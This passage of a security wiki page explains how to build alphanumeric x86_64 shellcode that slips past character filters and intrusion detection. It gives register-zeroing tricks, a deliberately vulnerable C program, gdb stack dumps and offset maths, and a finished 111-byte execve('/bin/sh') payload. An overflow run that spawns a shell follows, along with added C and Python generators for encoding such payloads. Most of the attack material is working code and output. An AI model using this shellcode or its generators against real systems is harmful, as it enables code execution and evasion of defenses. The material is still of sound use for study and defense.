| <syntaxhighlight lang="asm">xor %{32bit}, (%{64bit})</syntaxhighlight><br />
|}<br />
<br />
'''0x32''' is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x32<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{16bit}</syntaxhighlight><br />
|}<br />
<br />
'''0x33''' is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x33<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{32bit}</syntaxhighlight><br />
|}<br />
<br />
== The rsi and rdi registers ==<br />
<br />
Combining the knowledge of xor with the knowledge of the stack: whenever data is pushed, it is accessible at %ss:(%rsp). Knowing this, another register (e.g. %rcx) can be used to hold that address and set values on some of the more difficult registers:<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
First, utilise push and pop to simulate 'mov':<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp; \x54<br />
pop %rcx; \x59<br />
pop %rdx; \x5a (This just sets the stack pointer back)<br />
</syntaxhighlight>}}<br />
<br />
The xor forms above allow the index registers, %rsi and %rdi, to be set. For now, they will be zeroed out:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi; \x56<br />
xor %ss:(%rcx), %rsi; \x36\x48\x33\x31<br />
pop %r8; \x41\x58 <br />
push %rdi; \x57<br />
xor %ss:(%rcx), %rdi; \x36\x48\x33\x39<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%rsi<br />
*%rdi<br />
*%r8<br />
*%r9<br />
*%r10<br />
*%r14<br />
*%r15<br />
<br />
So far, in this sample, full control has not been utilized over:<br />
<br />
*%rsp<br />
*%rbp<br />
*%rbx<br />
*%r11<br />
*%r12<br />
*%r13<br />
<br />
As with push, controllable data is required before a register can be set. Where pop is concerned, something may first need to be pushed to the stack; in this case, only a zero register is required. Because of the way XOR works, once any register holds zero (here %rax is used as the zero register), it can be used to bring %rbx, %rsp, and %rbp to zero if needed:<br />
<br />
To get %rbx:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax; store that value in rax (rax was zero)<br />
xor %rax, %ss:0x30(%rcx); Null that area of stack<br />
imul $0x30,%ss:0x30(%rcx),%rbx; 0x30 * 0 = 0 <br />
imul $0x30,%ss:0x30(%rcx),%rbp; 0x30 * 0 = 0<br />
</syntaxhighlight>}}<br />
<br />
Once the stack slot, as well as the destination, is set to zero, %rax can effectively be mov(ed) into %rbp:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rax,%ss:0x30(%rcx); 36 48 31 41 30<br />
xor %ss:0x30(%rcx),%rbp; 36 48 33 69 30<br />
</syntaxhighlight>}}<br />
<br />
The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions, which add or subtract 1, 2, or 4 against the %rdi register (note that these are I/O instructions and fault in an unprivileged process). This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi is not in use, there is also a magic mov:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
movslq %ss:0x30(%rcx), %rsi<br />
xor %rsi, %ss:0x30(%rsi)<br />
</syntaxhighlight>}}<br />
<br />
This can come in quite handy when chunking large pieces of data to 0.<br />
<br />
==Example: Zeroing Out x86_64 CPU Registers==<br />
<br />
First %rsp is pushed to the top of the stack and the pointer address is popped into %rcx; the third instruction pops once more, moving %rsp one slot above %rcx so that the next push lands exactly at %ss:(%rcx).<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp<br />
pop %rcx<br />
pop %r8 <br />
</syntaxhighlight>}}<br />
<br />
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi<br />
xor %ss:(%rcx), %rsi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
xor %ss:(%rcx), %rdi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Zeroing out %rdx is much simpler, since %rdi is already zero.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
pop %rdx<br />
</syntaxhighlight>}}<br />
<br />
The following push and pop set %rax to 0x30. %al is the lowest order 8 bit subregister of %rax; since 0x30 resides in %al, the xor effectively zeroes out %rax.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push $0x30<br />
pop %rax<br />
xor $0x30, %al<br />
</syntaxhighlight>}}<br />
<br />
For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.<br />
<br />
Zero out the stack slot at %ss:0x30(%rcx).<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
xor %rbx into the stack segment and then xor it against rbx to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbx, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbx<br />
</syntaxhighlight>}}<br />
<br />
Rezero the stack segment with %rax. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdx<br />
pop %rax<br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
As before, xor %rbp into the stack segment and then xor it against rbp to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbp, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbp<br />
</syntaxhighlight>}}<br />
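As an added check that is not part of the original article, the following Python model executes the zeroing sequence above against constructed register and stack contents (the stack base is the sample %rsp from the gdb dump under Stack Analysis; every other value is made up) and returns the final register state. It confirms that %rbx, %rbp, %rdx, %rsi and %rdi end at zero and that %rsp returns to one slot above %rcx, and it also shows that %rax is left holding the old %rbx after the slot is re-zeroed, so a final push %rdx / pop %rax is needed if %rax must be zero as well.

```python
"""Register/stack model of the zeroing sequence above (added example, not article code)."""

MASK = (1 << 64) - 1
SLOT = ("rcx", 0x30)          # the scratch slot %ss:0x30(%rcx) the sequence reuses

# The article's instructions, in order, as (op, ...) tuples; memory operands are (base, disp).
ZEROING = [
    ("push", "rsp"), ("pop", "rcx"), ("pop", "r8"),                  # %rcx = saved %rsp
    ("push", "rsi"), ("xor_rm", ("rcx", 0), "rsi"), ("pop", "r8"),   # %rsi ^= %rsi via (%rcx)
    ("push", "rdi"), ("xor_rm", ("rcx", 0), "rdi"), ("pop", "r8"),   # %rdi ^= %rdi via (%rcx)
    ("push", "rdi"), ("pop", "rdx"),                                  # %rdx = 0
    ("push", 0x30), ("pop", "rax"), ("xor_al", 0x30),                 # %rax = 0
    ("xor_rm", SLOT, "rax"), ("xor_mr", "rax", SLOT),                 # clear the slot
    ("xor_mr", "rbx", SLOT), ("xor_rm", SLOT, "rbx"),                 # %rbx = 0
    ("push", "rdx"), ("pop", "rax"),                                  # %rax = 0 again
    ("xor_rm", SLOT, "rax"), ("xor_mr", "rax", SLOT),                 # re-clear the slot
    ("xor_mr", "rbp", SLOT), ("xor_rm", SLOT, "rbp"),                 # %rbp = 0
]


def run(seq, regs, mem):
    """Execute seq on a register dict and an 8-byte-slot memory dict (addr -> value)."""
    def addr(operand):
        base, disp = operand
        return (regs[base] + disp) & MASK

    for ins in seq:
        op = ins[0]
        if op == "push":                       # push reg, or push $imm8 (all immediates here are positive)
            val = regs[ins[1]] if isinstance(ins[1], str) else ins[1]
            regs["rsp"] = (regs["rsp"] - 8) & MASK
            mem[regs["rsp"]] = val & MASK
        elif op == "pop":
            regs[ins[1]] = mem.get(regs["rsp"], 0)
            regs["rsp"] = (regs["rsp"] + 8) & MASK
        elif op == "xor_rm":                   # AT&T "xor disp(base), reg": reg ^= mem
            regs[ins[2]] ^= mem.get(addr(ins[1]), 0)
        elif op == "xor_mr":                   # AT&T "xor reg, disp(base)": mem ^= reg
            a = addr(ins[2])
            mem[a] = mem.get(a, 0) ^ regs[ins[1]]
        elif op == "xor_al":                   # xor $imm8, %al: only the low byte of %rax changes
            regs["rax"] ^= ins[1] & 0xff
        else:
            raise ValueError("unknown op %r" % op)
    return regs, mem


def zeroing_result():
    """Run the sequence from constructed non-zero state; returns (final registers, stack base)."""
    base = 0x7fffffffe3c8                     # %rsp value taken from the gdb dump on this page
    regs = {"rax": 0x1111, "rbx": 0x2222, "rcx": 0x3333, "rdx": 0x4444, "rsp": base,
            "rbp": 0x5555, "rsi": 0x6666, "rdi": 0x7777, "r8": 0x8888}
    mem = {base: 0x41414141, base + 0x30: 0xdeadbeef}   # constructed stack contents, slot non-zero
    regs, _ = run(ZEROING, regs, mem)
    return regs, base
```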
<br />
= 64 bit shellcode: Conversion to alphanumeric code =<br />
* Because of the limited instruction set, the conversion requires many '''mov emulations''' via '''xor''', '''mul''', '''movslq''', '''push''', and '''pop'''.<br />
== bof.c ==<br />
{{info|This is a modified version of bof.c to allow for 200 bytes because the length of the final shellcode exceeds 100 bytes.}}<br />
{{code|text=<source lang="c"><br />
#include <stdlib.h><br />
#include <stdio.h><br />
#include <string.h><br />
<br />
int main(int argc, char *argv[]){<br />
char buffer[200];<br />
strcpy(buffer, argv[1]);<br />
return 0;<br />
}<br />
</source>}}<br />
<br />
== Starting shellcode (64-bit execve /bin/sh) ==<br />
{{info|This was converted to shellcode from the example in 64 bit linux assembly}}<br />
* execve('/bin/sh');<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
.globl _start<br />
_start:<br />
<br />
# a function is f(%rdi, %rsi, %rdx, %rcx, %r8, %r9).<br />
# Use zeroed memory to zero out %rsi, %rdi, %rdx<br />
xor %rdi, %rdi<br />
push %rdi<br />
push %rdi<br />
pop %rsi<br />
pop %rdx<br />
<br />
# Store '/bin/sh\0' in %rdi<br />
movq $0x68732f6e69622f6a, %rdi<br />
shr $0x8,%rdi<br />
push %rdi<br />
push %rsp<br />
pop %rdi<br />
push $0x3b<br />
pop %rax<br />
syscall # execve('/bin/sh', null, null)<br />
# function no. is 59/0x3b - execve()<br />
</source>}}<br />
<br />
* execve('/bin/sh') <br />
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"<br />
<br />
== Shellcode Analysis ==<br />
'''Immediately before the syscall:'''<br />
* %rax is set to 0x3b<br />
* %rdi is a pointer to '/bin/sh\0'<br />
* %rsi and %rdx are null<br />
To reproduce this with alphanumeric bytes, the two-byte '''syscall''' opcode (0x0f 0x05) is itself non-alphanumeric, so it must be written at runtime into a location ahead of the currently executing code, where execution reaches it once the registers are set. The '''xor''' and '''imul''' instructions are then used to set the register values.<br />
<br />
==Stack Analysis==<br />
{{info|These buffer dumps have been shortened for brevity and readability.}}<br />
[root@ares bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r $(perl -e 'print "A"x232;')<br />
Starting program: /home/hatter/bha/bof $(perl -e 'print "A"x232;')<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x0000000000400525 in main ()<br />
(gdb) x/500x $rsp <br />
'''0x7fffffffe3c8''': 0x41414141 0x41414141 0x41414141 0x41414141<br />
0x7fffffffe3d8: 0xffffe400 0x00007fff 0x00000000 0x00000002<br />
..........................<br />
0x7fffffffe708: 0x2f656d6f 0x68726f76 0x2f736565 0x2f616862<br />
0x7fffffffe718: 0x00666f62 '''0x41414141 0x41414141 0x41414141'''<br />
0x7fffffffe728: '''0x41414141 0x41414141 0x41414141 0x41414141'''<br />
<br />
* The formula to determine the offset to begin overwriting data from the stack pointer is '''([[return address]] + [[shellcode]] length) - %rsp'''.<br />
{| class="wikitable"<br />
|-<br />
! Operation<br />
! Value<br />
! Comments<br />
|-<br />
| <br />
| 0x7fffffffe726<br />
| [[return address]]<br />
|-<br />
| <center>'''+'''</center><br />
| 0x71<br />
| [[shellcode]] length (113 characters)<br />
|-<br />
| <center>'''-'''</center><br />
| 0x7fffffffe3c8<br />
| %rsp<br />
|-<br />
| <center>'''='''</center><br />
| '''0x3cf'''<br />
| '''Calculated offset from %rsp at time of overflow'''<br />
|}<br />
<br />
==The Offset==<br />
* To prepare for '''xor''' and '''imul''' manipulations, 0x5a is placed into %rax and %rsp is moved into %rcx.<br />
{{code|text=<source lang="asm"><br />
# Set %rcx as stack pointer <br />
# and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
</source>}}<br />
* Preparing for imul, an '''xor''' is used to place 0x0f into %rax, then push %rax to the stack.<br />
{{code|text=<source lang="asm"><br />
# Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax # 0x0f on the stack now.<br />
</source>}}<br />
<br />
* Because 0x41 * 0x0f = 0x3cf (975), the offset can be calculated in purely alphanumeric form. Modify this as code distances itself from the stack pointer during an exploit. The offset is stored in %rdi after setting back the stack pointer.<br />
{{code|text=<source lang="asm"><br />
pop %rax # restore %rsp; %rax is still 0x0f<br />
imul $0x41, (%rcx), %edi # %rdi = 0x3cf, a "magic offset" for us<br />
</source>}}<br />
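The search for such an encoding can be automated. The following C program is an added example and is not code from the original page; it assumes the same 0x5a seed and the same twelve-byte stub layout the page uses (push $seed; push %rsp; pop %rcx; pop %rax; xor $k,%al; push %rax; pop %rax; imul $m,(%rcx),%edi) and finds the alphanumeric xor byte k and imul multiplier m for any requested offset, generalising the 0x0f times 0x41 case above.<br />

```c
/*
 * Added example, not code from the original page: brute-force an alphanumeric
 * encoding of the "magic offset" the way the page derives 0x3cf, i.e. find
 * alphanumeric bytes k and m such that (seed ^ k) * m == target, then emit
 * the 12-byte stub
 *   push $seed ; push %rsp ; pop %rcx ; pop %rax
 *   xor $k, %al ; push %rax ; pop %rax ; imul $m, (%rcx), %edi
 * seed, k and m are immediates inside the instruction stream, so they must
 * themselves be alphanumeric or the stub would not pass the filter.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static int is_alnum_byte(uint8_t c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/*
 * imul r32, r/m32, imm8 sign-extends imm8, but every alphanumeric byte is
 * below 0x80, so m is always positive.  The dword at (%rcx) is the pushed
 * %rax, whose upper bytes are zero after "push $seed ; pop %rax".
 * Returns 1 and fills k/m on success, 0 if no alphanumeric pair exists.
 */
int find_imul_offset(uint8_t seed, uint32_t target, uint8_t *k, uint8_t *m)
{
    for (int kk = 0; kk < 256; kk++) {
        if (!is_alnum_byte((uint8_t)kk))
            continue;
        uint32_t v = (uint8_t)(seed ^ kk);      /* value left in %al */
        if (v == 0 || target % v != 0)
            continue;
        uint32_t mm = target / v;
        if (mm < 256 && is_alnum_byte((uint8_t)mm)) {
            *k = (uint8_t)kk;
            *m = (uint8_t)mm;
            return 1;
        }
    }
    return 0;
}

/* Writes the 12-byte stub; returns 12, or 0 if target is not encodable. */
size_t emit_offset_stub(uint8_t seed, uint32_t target, uint8_t out[12])
{
    uint8_t k, m;
    if (!is_alnum_byte(seed) || !find_imul_offset(seed, target, &k, &m))
        return 0;
    const uint8_t stub[12] = {
        0x6a, seed,         /* push $seed                       'j?'  */
        0x54, 0x59, 0x58,   /* push %rsp ; pop %rcx ; pop %rax  'TYX' */
        0x34, k,            /* xor $k, %al                      '4?'  */
        0x50, 0x58,         /* push %rax ; pop %rax             'PX'  */
        0x6b, 0x39, m       /* imul $m, (%rcx), %edi            'k9?' */
    };
    memcpy(out, stub, sizeof stub);
    return sizeof stub;
}

/* 1 if the stub for (seed, target) is exactly the 12 characters in expect. */
int stub_is(uint8_t seed, uint32_t target, const char *expect)
{
    uint8_t buf[12];
    return emit_offset_stub(seed, target, buf) == 12 &&
           strlen(expect) == 12 && memcmp(buf, expect, 12) == 0;
}

int main(void)
{
    uint8_t k, m, buf[12];
    if (find_imul_offset(0x5a, 0x3cf, &k, &m)) {
        emit_offset_stub(0x5a, 0x3cf, buf);
        printf("xor $0x%02x,%%al ; imul $0x%02x,(%%rcx),%%edi -> edi = 0x%x\n",
               (unsigned)k, (unsigned)m, (unsigned)((0x5a ^ k) * m));
        printf("stub: %.12s\n", (const char *)buf);
    } else {
        puts("no alphanumeric encoding for that offset");
    }
    return 0;
}
```

For the page's target 0x3cf the search reproduces the stub the page uses, "jZTYX4UPXk9A"; an offset such as 0x3ce (2 times a prime above 255) has no encoding with this stub shape and would need a different seed or a two-step imul.<br />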
<br />
==The Syscall==<br />
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
* These two alphanumeric dwords xor to 0x0000050f. Written to the stack little-endian this becomes the byte sequence 0f 05 00 00, and 0x0f 0x05 is the machine code for '''syscall'''.<br />
{{code|text=<source lang="asm"><br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
</source>}}<br />
<br />
* The %rax register now contains 0x0000050f. Push it so that the bytes 0f 05 00 00 land at (%rcx), then pop to set the stack pointer back.<br />
{{code|text=<source lang="asm"><br />
push %rax<br />
pop %rax # Garbage reg<br />
</source>}}<br />
<br />
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
==Arguments==<br />
===Stack Space===<br />
* Zero out a '''qword''' of data starting at %rcx + 0x30 (48 in decimal)<br />
{{code|text=<source lang="asm"><br />
# Allocate stack space<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
</source>}}<br />
<br />
===Register Initialization===<br />
* The %rdx, %rdi, and %rsi registers are used for the '''execve()''' syscall. These are zeroed out to initialize their values using the stack space previously allocated.<br />
{{code|text=<source lang="asm"><br />
# Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
</source>}}<br />
<br />
===String Argument===<br />
* '''/bin''' is placed onto the stack at the space allocated at %rcx + 0x30.<br />
{{code|text=<source lang="asm"><br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx)<br />
</source>}}<br />
* '''/sh\0''' is placed onto the stack at the space allocated at %rcx + 0x34.<br />
{{code|text=<source lang="asm"><br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) <br />
</source>}}<br />
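The syscall bytes above and the two halves of '/bin/sh\0' are all produced by the same trick: a push of one alphanumeric dword, a pop into %rax and an xor with a second alphanumeric dword. The following C program is an added example and is not code from the original page; it splits any 32-bit value into such a pair bytewise, emits the eleven-byte push/pop/xor stub, and checks the page's own three constants. The only assumption is that the stub layout is push $imm32 (0x68), pop %rax (0x58), xor $imm32,%eax (0x35), as on the page.<br />

```c
/*
 * Added example, not code from the original page: split a target dword into
 * two alphanumeric dwords A and B with A ^ B == target and emit the 11-byte
 * alphanumeric stub  push $A ; pop %rax ; xor $B, %eax  ('h????X5????')
 * that the page uses to load 0x0000050f (the syscall bytes), "/bin" and
 * "/sh\0" into %eax.  The split is bytewise, so the little-endian layout of
 * the immediates in the instruction stream does not change the result.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static int is_alnum_byte(uint8_t c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/* One byte: alphanumeric a, b with a ^ b == t.  Always fails for t >= 0x80
 * because every alphanumeric byte is below 0x80. */
static int split_byte(uint8_t t, uint8_t *a, uint8_t *b)
{
    for (int c = '0'; c <= 'z'; c++) {
        if (is_alnum_byte((uint8_t)c) && is_alnum_byte((uint8_t)(c ^ t))) {
            *a = (uint8_t)c;
            *b = (uint8_t)(c ^ t);
            return 1;
        }
    }
    return 0;
}

/* Whole dword; returns 1 and fills a/b, or 0 if some byte is unreachable. */
int alnum_xor_split(uint32_t target, uint32_t *a, uint32_t *b)
{
    *a = 0;
    *b = 0;
    for (int i = 0; i < 4; i++) {
        uint8_t ab, bb;
        if (!split_byte((uint8_t)(target >> (8 * i)), &ab, &bb))
            return 0;
        *a |= (uint32_t)ab << (8 * i);
        *b |= (uint32_t)bb << (8 * i);
    }
    return 1;
}

/* push $A (0x68 A) ; pop %rax (0x58) ; xor $B,%eax (0x35 B).  Returns 11 or 0. */
size_t emit_load_eax(uint32_t target, uint8_t out[11])
{
    uint32_t a, b;
    if (!alnum_xor_split(target, &a, &b))
        return 0;
    out[0] = 0x68;                              /* 'h' push imm32      */
    out[5] = 0x58;                              /* 'X' pop %rax        */
    out[6] = 0x35;                              /* '5' xor imm32,%eax  */
    for (int i = 0; i < 4; i++) {
        out[1 + i] = (uint8_t)(a >> (8 * i));   /* little-endian imm32 */
        out[7 + i] = (uint8_t)(b >> (8 * i));
    }
    return 11;
}

/* Value the stub leaves in %eax, recovered from its bytes. */
uint32_t stub_result(const uint8_t stub[11])
{
    uint32_t a = 0, b = 0;
    for (int i = 0; i < 4; i++) {
        a |= (uint32_t)stub[1 + i] << (8 * i);
        b |= (uint32_t)stub[7 + i] << (8 * i);
    }
    return a ^ b;
}

/* 1 if target is encodable, every emitted byte is alphanumeric and the stub
 * really evaluates to target; 0 otherwise. */
int check_load(uint32_t target)
{
    uint8_t stub[11];
    if (emit_load_eax(target, stub) != 11)
        return 0;
    for (int i = 0; i < 11; i++)
        if (!is_alnum_byte(stub[i]))
            return 0;
    return stub_result(stub) == target;
}

int main(void)
{
    /* The three constants the page loads, plus one that cannot be encoded. */
    const uint32_t targets[] = { 0x0000050fu, 0x6e69622fu, 0x0068732fu, 0x80000000u };
    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        uint8_t stub[11];
        if (emit_load_eax(targets[i], stub) == 11)
            printf("0x%08x -> %.11s\n", targets[i], (const char *)stub);
        else
            printf("0x%08x -> not encodable (a byte >= 0x80 has no alphanumeric xor pair)\n",
                   targets[i]);
    }
    return 0;
}
```

The generated pairs differ from the page's hand-picked constants (any pair with the right xor works), and the 0x80000000 case shows the hard limit of the technique: a byte with the top bit set can never be the xor of two alphanumeric bytes, so such values have to be built through memory or arithmetic instead.<br />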
* '''xor''' is used as a '''mov emulation''' to place '/bin/sh\0' into %rdi.<br />
{{code|text=<source lang="asm"><br />
xor 0x30(%rcx), %rdi<br />
</source>}}<br />
* Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rdi<br />
</source>}}<br />
<br />
===Final Registers===<br />
* %rsi and %rdx are already '''0'''. First push a known small positive byte so that the sign-extending '''movslq''' and the 64 bit '''xor''' read the same value from (%rcx), then zero %rdi.<br />
{{code|text=<source lang="asm"><br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi <br />
</source>}}<br />
* Pop so that %rsp points at '/bin/sh\0', push %rsp so that this pointer is stored at (%rcx), then use a mov emulation to load it into %rdi. %rdi then contains a pointer to '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
</source>}}<br />
* %rax is set to 59 or '''0x3b''' for the '''execve()''' syscall.<br />
{{code|text=<source lang="asm"><br />
xor $0x63, %al<br />
</source>}}<br />
'''Final registers:'''<br />
* %rax = 0x3b<br />
* %rdi = pointer to '/bin/sh\0'<br />
* %rsi = null<br />
* %rdx = null<br />
<br />
==Final Code==<br />
* x86_64 alphanumeric execve('/bin/sh',null,null) - 111 bytes:<br />
'''jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c'''<br />
{{info|Some assemblers prefer the '#' character to the ';' character for comments. User may have to find and replace to get it to assemble properly.}}{{code|text=<source lang="asm"><br />
.global _start<br />
.text<br />
_start:<br />
; Set %rcx as stack pointer <br />
; and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
<br />
; Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax ; 0x0f on the stack now.<br />
pop %rax ; add back to %rsp<br />
imul $0x41, (%rcx), %edi ; %rdi = 0x3cf, a "magic offset" for us<br />
; This is decimal value 975.<br />
; If this is too low/high, suggest a <br />
; modification to xor of %al for <br />
; changing the imul results<br />
<br />
; Write the syscall <br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1) ; 4 bytes have been nulled<br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
push %rax<br />
pop %rax ; Garbage reg<br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
<br />
; Syscall written, set values now.<br />
; allocate 8 bytes for '/bin/sh\0'<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
<br />
; Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
<br />
; Store '/bin/sh\0' in %rdi<br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx) ; '/bin' just went onto the stack<br />
<br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) ; '/sh\0' just went onto the stack<br />
xor 0x30(%rcx), %rdi ; %rdi now contains '/bin/sh\0'<br />
<br />
<br />
pop %rax<br />
push %rdi<br />
<br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi ; %rdi zeroed<br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
xor $0x63, %al</source>}}<br />
<br />
== Successful Overflow Test ==<br />
{{info|This [[shellcode]] was tested on a modified [[Buffer_Overflows#bof.c|bof.c]] to make the buffer 200 bytes instead of 100 bytes, as the shellcode here exceeds the original buffer size.}}<br />
<br />
[user@host bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
Starting program: /home/hatter/bha/bof `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
process 28444 is executing new program: /bin/bash<br />
[user@host bha]# uname -m<br />
x86_64<br />
[user@host bha]# exit<br />
exit<br />
[Inferior 1 (process 28444) exited normally]<br />
(gdb) <br />
{{exploitation}}{{programming}}{{social}}<br />
[[Category:Shellcode]]</div>
DPYJulietowbaijc
https://nets.ec/index.php?title=Alphanumeric_shellcode&diff=9079
Alphanumeric shellcode
2012-09-19T16:24:52Z
<p>DPYJulietowbaijc: /* 15 byte architecture detection shellcode */</p>
<hr />
<div><center>'''Alphanumeric [[shellcode]]''' is similar to [[ascii shellcode]] in that it is used to [[filter bypass|bypass character filters]] and [[IDS evasion|evade intrusion-detection]] during [[Buffer Overflows|buffer overflow]] [[exploitation]].</center>{{info|<center>This article documents alphanumeric code on [[#15_Byte_Architecture_Detection_Shellcode|multiple architectures]], but primarily the '''64 bit''' x86 architecture.</center>}}<br />
{{prereq|[[bitwise math]], [[assembly]] and [[shellcode]].}}<br />
<br />
= Available x86_64 instructions =<br />
{{info|This chart contains '''64-bit''' alphanumeric opcodes. 32-bit alphanumeric opcodes are available at the 32-bit [[ascii shellcode]] entry. When limited only to instructions that have corresponding ascii characters; programmers must emulate other required instructions using only the instructions available.}}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Numeric<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0<br />
| 0x30<br />
| xor %{8bit}, (%{64bit})<br />
|-<br />
! scope="row" | 1<br />
| 0x31<br />
| xor %{32bit}, (%{64bit})<br />
|-<br />
! scope="row" | 2<br />
| 0x32<br />
